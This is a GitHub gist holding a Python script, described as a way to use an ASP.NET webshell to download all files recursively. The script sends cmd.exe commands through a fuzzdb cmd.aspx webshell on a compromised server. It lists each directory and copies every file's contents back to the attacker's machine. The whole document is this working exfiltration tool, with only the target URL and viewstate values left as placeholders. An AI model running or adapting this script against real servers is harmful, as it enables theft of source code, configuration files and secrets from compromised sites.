Last active
August 12, 2019 20:38
-
-
Save ypcrts/475c8c8a4c0db530ba8a8ef7b608e3d4 to your computer and use it in GitHub Desktop.
rsync for dot net // asp webshell exploited to download all files recursively
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import os | |
| import os.path | |
| import re | |
| # using fuzzdb webshell | |
| # https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx | |
| shell_url = 'https://example.com/vulnerable' | |
| cmd_output_re = re.compile(r'.*\<pre\>(.*)\</pre\>', re.DOTALL) | |
| lt_re = re.compile(r'<') | |
| gt_re = re.compile(r'>') | |
| server_path = r'C:\filepath\web' | |
| server_viewstate = r'FILLMEUP' | |
| server_viewstate_key = r'FILLMEUP' | |
| def fire(subcommand): | |
| assert subcommand and str(subcommand), 'subcommand bad' | |
| params = dict( | |
| xpath=r'c:\windows\system32\cmd.exe', | |
| xcmd='/c %s' % subcommand, | |
| Button='Run', | |
| __VIEWSTATEGENERATOR=server_viewstate_key, | |
| __VIEWSTATE=server_viewstate | |
| ) | |
| res = requests.post(shell_url, data=params) | |
| output_match = cmd_output_re.match(res.text) | |
| assert output_match, "subcommand failed" | |
| subcommand_output = output_match.group(1) | |
| # assert subcommand_output | |
| return subcommand_output.strip() | |
| def obtain(reldirpath=''): | |
| print('\n\nentering directory', reldirpath) | |
| # directory listing | |
| files = fire('dir /B /a-d {}\\{}'.format(server_path,reldirpath)).split('\r\n') | |
| dirs = fire('dir /B /ad {}\\{}'.format(server_path,reldirpath)).split('\r\n') | |
| #strip | |
| files = list(map(str.strip, files)) | |
| dirs = list(map(str.strip, dirs)) | |
| # obtain files | |
| for filename in files: | |
| if not filename: | |
| continue | |
| relfilepath = ( | |
| '{}\\\\{}'.format(reldirpath, filename) | |
| if reldirpath else filename | |
| ) | |
| unixrelfilepath = re.sub(r'[\\]', r'/', relfilepath) | |
| local_output_file_path = 'output/' + unixrelfilepath | |
| if not os.path.exists(local_output_file_path): | |
| print(relfilepath, 'downloading') | |
| d = fire('type "{}\\{}"'.format(server_path, relfilepath)) | |
| d = lt_re.sub('<', d) | |
| d = gt_re.sub('>', d) | |
| os.system('mkdir -p {}'.format(os.path.dirname(local_output_file_path))) | |
| with open(local_output_file_path, 'w') as fp: | |
| fp.write(d) | |
| else: | |
| print(relfilepath, 'skipping') | |
| for directory in dirs: | |
| #if not directory or directory in ('Bin','Css',): | |
| # continue | |
| obtain(reldirpath + '\\' + directory) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment